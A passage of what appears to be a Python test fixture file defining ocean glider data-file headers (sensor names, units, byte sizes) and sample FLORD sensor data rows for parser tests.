1 4 4 4 4 4 4 4 4 4 4 4 8 8 1 4 1 1 1 4 4 4 1 1 1 1 8 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 1 4 4 4 4 1 1 1 4 4 4 4 4 4 4 4 4 4 1 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 4 8 8 8 8 8 8 4 4 1 4 4 4 1 8 8 4 1 1 1 1 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 4 1 4 4 1 1 1 1 1 1 1 1 1 1 1 4 8 1 4 4 1 4 4 4 4 8 4 4 4 4 8 4 4 4 4 4 8 4 4 4 4 4 1 4 4 1 1 4 8 1 4 4 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 4 1 4 4 8 8 4 1 4 4 4 4 8 1 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 1 4 8 4 4 4 4 4 4 8 1 4 1 4 4 4 8 4 4 1 1 4 4 4 4 4 """
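# HEADER4: the base glider header plus an x_low_power_status column (sensors_per_cycle: 347).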
HEADER4 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_247-2012-051-0-0-sf
the8x3_filename: 01840000
filename_extension: dbd
filename_label: unit_247-2012-051-0-0-dbd(01840000)
mission_name: ENDUR1.MI
fileopen_time: Tue_Feb_21_18:39:39_2012
sensors_per_cycle: 347
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_247-2012-051-0-0
c_air_pump c_ballast_pumped c_battpos c_battroll c_bsipar_on c_de_oil_vol c_dvl_on c_flbbcd_on c_heading c_oxy3835_wphase_on c_pitch c_profile_on c_wpt_lat c_wpt_lon m_1meg_persistor m_aground_water_depth m_air_fill m_air_pump m_altimeter_status m_altimeter_voltage m_altitude m_altitude_rate m_appear_to_be_at_surface m_argos_is_xmitting m_argos_on m_argos_sent_data m_argos_timestamp m_at_risk_depth m_avbot_enable m_avbot_power m_avg_climb_rate m_avg_depth_rate m_avg_dive_rate m_avg_downward_inflection_time m_avg_speed m_avg_system_clock_lags_gps m_avg_upward_inflection_time m_avg_yo_time m_ballast_pumped m_ballast_pumped_energy m_ballast_pumped_vel m_battery m_battery_inst m_battpos m_battpos_vel m_battroll m_battroll_vel m_bpump_fault_bit m_certainly_at_surface m_chars_tossed_by_abend m_chars_tossed_with_cd_off m_chars_tossed_with_power_off m_climb_tot_time m_console_cd m_console_on m_cop_tickle m_coulomb_amphr m_coulomb_amphr_raw m_coulomb_amphr_total m_coulomb_current m_coulomb_current_raw m_cycle_number m_depth m_depth_rate m_depth_rate_avg_final m_depth_rate_running_avg m_depth_rate_running_avg_n m_depth_rate_subsampled m_depth_rejected m_depth_state m_depth_subsampled m_device_drivers_called_abnormally m_device_error m_device_oddity m_device_warning m_de_oil_vol m_de_oil_vol_pot_voltage m_de_pump_fault_count m_digifin_cmd_done m_digifin_cmd_error m_digifin_leakdetect_reading m_digifin_motorstep_counter m_digifin_resp_data m_digifin_status m_disk_free m_disk_usage m_dist_to_wpt m_dive_depth m_dive_tot_time m_dr_fix_time m_dr_postfix_time m_dr_surf_x_lmc m_dr_surf_y_lmc m_dr_time m_dr_x_actual_err m_dr_x_ini_err m_dr_x_postfix_drift m_dr_x_ta_postfix_drift m_dr_y_actual_err m_dr_y_ini_err m_dr_y_postfix_drift m_dr_y_ta_postfix_drift m_est_time_to_surface m_fin m_final_water_vx m_final_water_vy m_fin_vel m_fluid_pumped m_fluid_pumped_aft_hall_voltage m_fluid_pumped_fwd_hall_voltage m_fluid_pumped_vel m_free_heap m_gps_dist_from_dr m_gps_fix_x_lmc m_gps_fix_y_lmc m_gps_full_status m_gps_heading m_gps_ignored_lat m_gps_ignored_lon m_gps_invalid_lat m_gps_invalid_lon m_gps_lat m_gps_lon m_gps_mag_var m_gps_num_satellites m_gps_on m_gps_postfix_x_lmc m_gps_postfix_y_lmc m_gps_speed m_gps_status m_gps_toofar_lat m_gps_toofar_lon m_gps_uncertainty m_gps_utc_day m_gps_utc_hour m_gps_utc_minute m_gps_utc_month m_gps_utc_second m_gps_utc_year m_gps_x_lmc m_gps_y_lmc m_hdg_derror m_hdg_error m_hdg_ierror m_hdg_rate m_heading m_initial_water_vx m_initial_water_vy m_iridium_attempt_num m_iridium_call_num m_iridium_connected m_iridium_console_on m_iridium_dialed_num m_iridium_on m_iridium_redials m_iridium_signal_strength m_iridium_status m_iridium_waiting_redial_delay m_iridium_waiting_registration m_is_ballast_pump_moving m_is_battpos_moving m_is_battroll_moving m_is_de_pump_moving m_is_fin_moving m_is_fpitch_pump_moving m_is_speed_estimated m_is_thermal_valve_moving m_last_yo_time m_lat m_leak m_leakdetect_voltage m_leakdetect_voltage_forward m_leak_forward m_lithium_battery_relative_charge m_lithium_battery_status m_lithium_battery_time_to_charge m_lithium_battery_time_to_discharge m_lon m_min_free_heap m_min_spare_heap m_mission_avg_speed_climbing m_mission_avg_speed_diving m_mission_start_time m_num_half_yos_in_segment m_pitch m_pitch_energy m_pitch_error m_present_secs_into_mission m_present_time m_pressure m_pressure_raw_voltage_sample0 m_pressure_raw_voltage_sample19 m_pressure_voltage m_raw_altitude m_raw_altitude_rejected m_roll m_science_clothesline_lag m_science_on 
m_science_ready_for_consci m_science_sent_some_data m_science_sync_time m_science_unreadiness_for_consci m_spare_heap m_speed m_stable_comms m_strobe_ctrl m_surface_est_cmd m_surface_est_ctd m_surface_est_fw m_surface_est_gps m_surface_est_irid m_surface_est_total m_system_clock_lags_gps m_tcm3_is_calibrated m_tcm3_magbearth m_tcm3_poll_time m_tcm3_recv_start_time m_tcm3_recv_stop_time m_tcm3_stddeverr m_tcm3_xcoverage m_tcm3_ycoverage m_tcm3_zcoverage m_thermal_acc_pres m_thermal_acc_pres_voltage m_thermal_acc_vol m_thermal_enuf_acc_vol m_thermal_pump m_thermal_updown m_thermal_valve m_time_til_wpt m_tot_ballast_pumped_energy m_tot_horz_dist m_tot_num_inflections m_tot_on_time m_vacuum m_vehicle_temp m_veh_overheat m_veh_temp m_vmg_to_wpt m_vx_lmc m_vy_lmc m_water_cond m_water_delta_vx m_water_delta_vy m_water_depth m_water_pressure m_water_temp m_water_vx m_water_vy m_why_started m_x_lmc m_y_lmc x_last_wpt_lat x_last_wpt_lon x_system_clock_adjusted sci_bsipar_is_installed sci_bsipar_par sci_bsipar_sensor_volts sci_bsipar_supply_volts sci_bsipar_temp sci_bsipar_timestamp sci_ctd41cp_is_installed sci_ctd41cp_timestamp sci_dvl_bd_range_to_bottom sci_dvl_bd_time_since_last_good_vel sci_dvl_bd_u_dist sci_dvl_bd_v_dist sci_dvl_bd_w_dist sci_dvl_be_u_vel sci_dvl_be_v_vel sci_dvl_be_vel_good sci_dvl_be_w_vel sci_dvl_bi_err_vel sci_dvl_bi_vel_good sci_dvl_bi_x_vel sci_dvl_bi_y_vel sci_dvl_bi_z_vel sci_dvl_bs_longitudinal_vel sci_dvl_bs_normal_vel sci_dvl_bs_transverse_vel sci_dvl_bs_vel_good sci_dvl_ensemble_offset sci_dvl_error sci_dvl_is_installed sci_dvl_sa_heading sci_dvl_sa_pitch sci_dvl_sa_roll sci_dvl_ts_bit sci_dvl_ts_depth sci_dvl_ts_sal sci_dvl_ts_sound_speed sci_dvl_ts_temp sci_dvl_ts_timestamp sci_dvl_wd_range_to_water_mass_center sci_dvl_wd_time_since_last_good_vel sci_dvl_wd_u_dist sci_dvl_wd_v_dist sci_dvl_wd_w_dist sci_dvl_we_u_vel sci_dvl_we_v_vel sci_dvl_we_vel_good sci_dvl_we_w_vel sci_dvl_wi_err_vel sci_dvl_wi_vel_good sci_dvl_wi_x_vel sci_dvl_wi_y_vel sci_dvl_wi_z_vel sci_dvl_ws_longitudinal_vel sci_dvl_ws_normal_vel sci_dvl_ws_transverse_vel sci_dvl_ws_vel_good sci_flbbcd_bb_ref sci_flbbcd_bb_sig sci_flbbcd_bb_units sci_flbbcd_cdom_ref sci_flbbcd_cdom_sig sci_flbbcd_cdom_units sci_flbbcd_chlor_ref sci_flbbcd_chlor_sig sci_flbbcd_chlor_units sci_flbbcd_is_installed sci_flbbcd_therm sci_flbbcd_timestamp sci_m_disk_free sci_m_disk_usage sci_m_free_heap sci_m_min_free_heap sci_m_min_spare_heap sci_m_present_secs_into_mission sci_m_present_time sci_m_science_on sci_m_spare_heap sci_oxy3835_is_installed sci_oxy3835_oxygen sci_oxy3835_saturation sci_oxy3835_temp sci_oxy3835_timestamp sci_reqd_heartbeat sci_software_ver sci_wants_comms sci_wants_surface sci_water_cond sci_water_pressure sci_water_temp sci_x_disk_files_removed sci_x_sent_data_files x_low_power_status
enum cc in rad sec cc sec sec rad sec rad sec lat lon bool m bool bool enum volts m m/s bool bool bool bool timestamp m bool bool m/s m/s m/s sec m/s sec sec sec cc joules cc/sec volts volts in in/sec rad rad/sec bool bool nodim nodim nodim s bool bool bool amp-hrs nodim amp-hrs amp nodim nodim m m/s m/s m/s enum m/s bool enum m nodim nodim nodim nodim cc volts nodim nodim nodim nodim nodim nodim nodim Mbytes Mbytes m m s sec sec m m sec m m m m m m m m sec rad m/s m/s rad/sec cc volts volts cc/sec bytes m m m enum rad lat lon lat lon lat lon rad nodim bool m m m/s enum lat lat nodim byte byte byte byte nodim byte m m rad/sec rad rad-sec rad/sec rad m/s m/s nodim nodim bool enum nodim bool nodim nodim enum bool bool bool bool bool bool bool bool bool bool sec lat bool volts volts bool % nodim mins mins lon bytes bytes m/s m/s timestamp nodim rad joules rad sec timestamp bar volts volts volts m bool rad s bool bool nodim timestamp enum bytes m/s bool bool nodim nodim nodim nodim nodim nodim sec bool uT ms ms ms uT % % % bar volts cc bool enum enum enum s kjoules km nodim days inHg degC bool c m/s m/s m/s S/m m/s m/s m bar degC m/s m/s enum m m lat lon sec bool ue/m^2sec volts volts degc timestamp bool timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim bool deg deg deg nodim m ppt m/s degc timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim nodim nodim nodim ppb nodim nodim ug/l bool nodim timestamp mbytes mbytes bytes bytes bytes sec timestamp bool bytes bool nodim nodim nodim timestamp secs nodim bool enum s/m bar degc nodim nodim volts
1 4 4 4 4 4 4 4 4 4 4 4 8 8 1 4 1 1 1 4 4 4 1 1 1 1 8 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 1 4 4 4 4 1 1 1 4 4 4 4 4 4 4 4 4 4 1 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 4 8 8 8 8 8 8 4 4 1 4 4 4 1 8 8 4 1 1 1 1 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 4 1 4 4 1 1 1 1 1 1 1 1 1 1 1 4 8 1 4 4 1 4 4 4 4 8 4 4 4 4 8 4 4 4 4 4 8 4 4 4 4 4 1 4 4 1 1 4 8 1 4 4 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 4 1 4 4 8 8 4 1 4 4 4 4 8 1 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 1 4 8 4 4 4 4 4 4 8 1 4 1 4 4 4 8 4 4 1 1 4 4 4 4 4 4 """
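# HEADER5: the base glider header plus the eight sci_flbb_* columns (sensors_per_cycle: 354).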
HEADER5 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_247-2012-051-0-0-sf
the8x3_filename: 01840000
filename_extension: dbd
filename_label: unit_247-2012-051-0-0-dbd(01840000)
mission_name: ENDUR1.MI
fileopen_time: Tue_Feb_21_18:39:39_2012
sensors_per_cycle: 354
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_247-2012-051-0-0
c_air_pump c_ballast_pumped c_battpos c_battroll c_bsipar_on c_de_oil_vol c_dvl_on c_flbbcd_on c_heading c_oxy3835_wphase_on c_pitch c_profile_on c_wpt_lat c_wpt_lon m_1meg_persistor m_aground_water_depth m_air_fill m_air_pump m_altimeter_status m_altimeter_voltage m_altitude m_altitude_rate m_appear_to_be_at_surface m_argos_is_xmitting m_argos_on m_argos_sent_data m_argos_timestamp m_at_risk_depth m_avbot_enable m_avbot_power m_avg_climb_rate m_avg_depth_rate m_avg_dive_rate m_avg_downward_inflection_time m_avg_speed m_avg_system_clock_lags_gps m_avg_upward_inflection_time m_avg_yo_time m_ballast_pumped m_ballast_pumped_energy m_ballast_pumped_vel m_battery m_battery_inst m_battpos m_battpos_vel m_battroll m_battroll_vel m_bpump_fault_bit m_certainly_at_surface m_chars_tossed_by_abend m_chars_tossed_with_cd_off m_chars_tossed_with_power_off m_climb_tot_time m_console_cd m_console_on m_cop_tickle m_coulomb_amphr m_coulomb_amphr_raw m_coulomb_amphr_total m_coulomb_current m_coulomb_current_raw m_cycle_number m_depth m_depth_rate m_depth_rate_avg_final m_depth_rate_running_avg m_depth_rate_running_avg_n m_depth_rate_subsampled m_depth_rejected m_depth_state m_depth_subsampled m_device_drivers_called_abnormally m_device_error m_device_oddity m_device_warning m_de_oil_vol m_de_oil_vol_pot_voltage m_de_pump_fault_count m_digifin_cmd_done m_digifin_cmd_error m_digifin_leakdetect_reading m_digifin_motorstep_counter m_digifin_resp_data m_digifin_status m_disk_free m_disk_usage m_dist_to_wpt m_dive_depth m_dive_tot_time m_dr_fix_time m_dr_postfix_time m_dr_surf_x_lmc m_dr_surf_y_lmc m_dr_time m_dr_x_actual_err m_dr_x_ini_err m_dr_x_postfix_drift m_dr_x_ta_postfix_drift m_dr_y_actual_err m_dr_y_ini_err m_dr_y_postfix_drift m_dr_y_ta_postfix_drift m_est_time_to_surface m_fin m_final_water_vx m_final_water_vy m_fin_vel m_fluid_pumped m_fluid_pumped_aft_hall_voltage m_fluid_pumped_fwd_hall_voltage m_fluid_pumped_vel m_free_heap m_gps_dist_from_dr m_gps_fix_x_lmc m_gps_fix_y_lmc m_gps_full_status m_gps_heading m_gps_ignored_lat m_gps_ignored_lon m_gps_invalid_lat m_gps_invalid_lon m_gps_lat m_gps_lon m_gps_mag_var m_gps_num_satellites m_gps_on m_gps_postfix_x_lmc m_gps_postfix_y_lmc m_gps_speed m_gps_status m_gps_toofar_lat m_gps_toofar_lon m_gps_uncertainty m_gps_utc_day m_gps_utc_hour m_gps_utc_minute m_gps_utc_month m_gps_utc_second m_gps_utc_year m_gps_x_lmc m_gps_y_lmc m_hdg_derror m_hdg_error m_hdg_ierror m_hdg_rate m_heading m_initial_water_vx m_initial_water_vy m_iridium_attempt_num m_iridium_call_num m_iridium_connected m_iridium_console_on m_iridium_dialed_num m_iridium_on m_iridium_redials m_iridium_signal_strength m_iridium_status m_iridium_waiting_redial_delay m_iridium_waiting_registration m_is_ballast_pump_moving m_is_battpos_moving m_is_battroll_moving m_is_de_pump_moving m_is_fin_moving m_is_fpitch_pump_moving m_is_speed_estimated m_is_thermal_valve_moving m_last_yo_time m_lat m_leak m_leakdetect_voltage m_leakdetect_voltage_forward m_leak_forward m_lithium_battery_relative_charge m_lithium_battery_status m_lithium_battery_time_to_charge m_lithium_battery_time_to_discharge m_lon m_min_free_heap m_min_spare_heap m_mission_avg_speed_climbing m_mission_avg_speed_diving m_mission_start_time m_num_half_yos_in_segment m_pitch m_pitch_energy m_pitch_error m_present_secs_into_mission m_present_time m_pressure m_pressure_raw_voltage_sample0 m_pressure_raw_voltage_sample19 m_pressure_voltage m_raw_altitude m_raw_altitude_rejected m_roll m_science_clothesline_lag m_science_on 
m_science_ready_for_consci m_science_sent_some_data m_science_sync_time m_science_unreadiness_for_consci m_spare_heap m_speed m_stable_comms m_strobe_ctrl m_surface_est_cmd m_surface_est_ctd m_surface_est_fw m_surface_est_gps m_surface_est_irid m_surface_est_total m_system_clock_lags_gps m_tcm3_is_calibrated m_tcm3_magbearth m_tcm3_poll_time m_tcm3_recv_start_time m_tcm3_recv_stop_time m_tcm3_stddeverr m_tcm3_xcoverage m_tcm3_ycoverage m_tcm3_zcoverage m_thermal_acc_pres m_thermal_acc_pres_voltage m_thermal_acc_vol m_thermal_enuf_acc_vol m_thermal_pump m_thermal_updown m_thermal_valve m_time_til_wpt m_tot_ballast_pumped_energy m_tot_horz_dist m_tot_num_inflections m_tot_on_time m_vacuum m_vehicle_temp m_veh_overheat m_veh_temp m_vmg_to_wpt m_vx_lmc m_vy_lmc m_water_cond m_water_delta_vx m_water_delta_vy m_water_depth m_water_pressure m_water_temp m_water_vx m_water_vy m_why_started m_x_lmc m_y_lmc x_last_wpt_lat x_last_wpt_lon x_system_clock_adjusted sci_bsipar_is_installed sci_bsipar_par sci_bsipar_sensor_volts sci_bsipar_supply_volts sci_bsipar_temp sci_bsipar_timestamp sci_ctd41cp_is_installed sci_ctd41cp_timestamp sci_dvl_bd_range_to_bottom sci_dvl_bd_time_since_last_good_vel sci_dvl_bd_u_dist sci_dvl_bd_v_dist sci_dvl_bd_w_dist sci_dvl_be_u_vel sci_dvl_be_v_vel sci_dvl_be_vel_good sci_dvl_be_w_vel sci_dvl_bi_err_vel sci_dvl_bi_vel_good sci_dvl_bi_x_vel sci_dvl_bi_y_vel sci_dvl_bi_z_vel sci_dvl_bs_longitudinal_vel sci_dvl_bs_normal_vel sci_dvl_bs_transverse_vel sci_dvl_bs_vel_good sci_dvl_ensemble_offset sci_dvl_error sci_dvl_is_installed sci_dvl_sa_heading sci_dvl_sa_pitch sci_dvl_sa_roll sci_dvl_ts_bit sci_dvl_ts_depth sci_dvl_ts_sal sci_dvl_ts_sound_speed sci_dvl_ts_temp sci_dvl_ts_timestamp sci_dvl_wd_range_to_water_mass_center sci_dvl_wd_time_since_last_good_vel sci_dvl_wd_u_dist sci_dvl_wd_v_dist sci_dvl_wd_w_dist sci_dvl_we_u_vel sci_dvl_we_v_vel sci_dvl_we_vel_good sci_dvl_we_w_vel sci_dvl_wi_err_vel sci_dvl_wi_vel_good sci_dvl_wi_x_vel sci_dvl_wi_y_vel sci_dvl_wi_z_vel sci_dvl_ws_longitudinal_vel sci_dvl_ws_normal_vel sci_dvl_ws_transverse_vel sci_dvl_ws_vel_good sci_flbbcd_bb_ref sci_flbbcd_bb_sig sci_flbbcd_bb_units sci_flbbcd_cdom_ref sci_flbbcd_cdom_sig sci_flbbcd_cdom_units sci_flbbcd_chlor_ref sci_flbbcd_chlor_sig sci_flbbcd_chlor_units sci_flbbcd_is_installed sci_flbbcd_therm sci_flbbcd_timestamp sci_m_disk_free sci_m_disk_usage sci_m_free_heap sci_m_min_free_heap sci_m_min_spare_heap sci_m_present_secs_into_mission sci_m_present_time sci_m_science_on sci_m_spare_heap sci_oxy3835_is_installed sci_oxy3835_oxygen sci_oxy3835_saturation sci_oxy3835_temp sci_oxy3835_timestamp sci_reqd_heartbeat sci_software_ver sci_wants_comms sci_wants_surface sci_water_cond sci_water_pressure sci_water_temp sci_x_disk_files_removed sci_x_sent_data_files sci_flbb_timestamp sci_flbb_bb_ref sci_flbb_bb_sig sci_flbb_bb_units sci_flbb_chlor_ref sci_flbb_chlor_sig sci_flbb_chlor_units sci_flbb_therm
enum cc in rad sec cc sec sec rad sec rad sec lat lon bool m bool bool enum volts m m/s bool bool bool bool timestamp m bool bool m/s m/s m/s sec m/s sec sec sec cc joules cc/sec volts volts in in/sec rad rad/sec bool bool nodim nodim nodim s bool bool bool amp-hrs nodim amp-hrs amp nodim nodim m m/s m/s m/s enum m/s bool enum m nodim nodim nodim nodim cc volts nodim nodim nodim nodim nodim nodim nodim Mbytes Mbytes m m s sec sec m m sec m m m m m m m m sec rad m/s m/s rad/sec cc volts volts cc/sec bytes m m m enum rad lat lon lat lon lat lon rad nodim bool m m m/s enum lat lat nodim byte byte byte byte nodim byte m m rad/sec rad rad-sec rad/sec rad m/s m/s nodim nodim bool enum nodim bool nodim nodim enum bool bool bool bool bool bool bool bool bool bool sec lat bool volts volts bool % nodim mins mins lon bytes bytes m/s m/s timestamp nodim rad joules rad sec timestamp bar volts volts volts m bool rad s bool bool nodim timestamp enum bytes m/s bool bool nodim nodim nodim nodim nodim nodim sec bool uT ms ms ms uT % % % bar volts cc bool enum enum enum s kjoules km nodim days inHg degC bool c m/s m/s m/s S/m m/s m/s m bar degC m/s m/s enum m m lat lon sec bool ue/m^2sec volts volts degc timestamp bool timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim bool deg deg deg nodim m ppt m/s degc timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim nodim nodim nodim ppb nodim nodim ug/l bool nodim timestamp mbytes mbytes bytes bytes bytes sec timestamp bool bytes bool nodim nodim nodim timestamp secs nodim bool enum s/m bar degc nodim nodim seconds 1 1 1 1 1 ug/L 1
1 4 4 4 4 4 4 4 4 4 4 4 8 8 1 4 1 1 1 4 4 4 1 1 1 1 8 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 1 4 4 4 4 1 1 1 4 4 4 4 4 4 4 4 4 4 1 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 1 4 8 8 8 8 8 8 4 4 1 4 4 4 1 8 8 4 1 1 1 1 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 4 1 4 4 1 1 1 1 1 1 1 1 1 1 1 4 8 1 4 4 1 4 4 4 4 8 4 4 4 4 8 4 4 4 4 4 8 4 4 4 4 4 1 4 4 1 1 4 8 1 4 4 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 1 1 1 1 4 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 4 4 4 1 4 4 8 8 4 1 4 4 4 4 8 1 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 1 4 4 1 4 4 4 4 4 4 1 4 4 4 4 4 4 4 4 4 1 4 8 4 4 4 4 4 4 8 1 4 1 4 4 4 8 4 4 1 1 4 4 4 4 4 4 4 4 4 4 4 4 4 """
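# HEADER6: a short 40-sensor .sbd header (glider gi_528) carrying the sci_bb3slo_* columns used by the FLORT-O tests.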
HEADER6 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: gi_528-2015-228-3-0
the8x3_filename: 00540000
filename_extension: sbd
filename_label: gi_528-2015-228-3-0-sbd(00540000)
mission_name: INI0.MI
fileopen_time: Mon_Aug_17_14:45:23_2015
sensors_per_cycle: 40
num_label_lines: 3
num_segments: 1
segment_filename_0: gi_528-2015-228-3-0
c_battpos c_wpt_lat c_wpt_lon m_battpos m_coulomb_amphr_total m_coulomb_current m_depth m_de_oil_vol m_gps_lat m_gps_lon m_lat m_leakdetect_voltage m_leakdetect_voltage_forward m_lon m_pitch m_present_secs_into_mission m_present_time m_speed m_water_vx m_water_vy x_low_power_status sci_bb3slo_b470_sig sci_bb3slo_b532_sig sci_bb3slo_b660_sig sci_bb3slo_temp sci_bsipar_par sci_flbbcd_bb_sig sci_flbbcd_cdom_sig sci_flbbcd_chlor_sig sci_m_present_secs_into_mission sci_m_present_time sci_oxy4_oxygen sci_oxy4_saturation sci_oxy4_temp sci_suna_nitrate_mg sci_suna_nitrate_um sci_suna_record_offset sci_water_cond sci_water_pressure sci_water_temp
in lat lon in amp-hrs amp m cc lat lon lat volts volts lon rad sec timestamp m/s m/s m/s nodim nodim nodim nodim nodim ue/m^2sec nodim nodim nodim sec timestamp um % degc mg/l umol/l bytes s/m bar degc
4 8 8 4 4 4 4 4 8 8 8 4 4 8 4 4 8 4 4 4 4 4 4 4 4 4 4 4 4 4 8 4 4 4 4 4 4 4 4 4 """
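# FLORD_RECORD: two data rows that appear to match HEADER5 (note the trailing sci_flbb_* values); NaN marks a sensor with no reading in that row.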
FLORD_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 664.424 0.401911 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 139 0.000281336 460 72 2.0352 695 114 0.8349 NaN 560 1000.1 NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN 266.42 93.49 9.48 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 700 139 0.000281 695 114 0.8349 560
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 645.569 0.390792 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 892 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 133 0.000262988 460 73 2.12 695 115 0.847 NaN 559 1000.1 NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 700 133 0.000263 695 115 0.847 559"""
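# ENGSCI_RECORD: two full engineering/science rows with valid GPS latitude/longitude fields.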
ENGSCI_RECORD = """
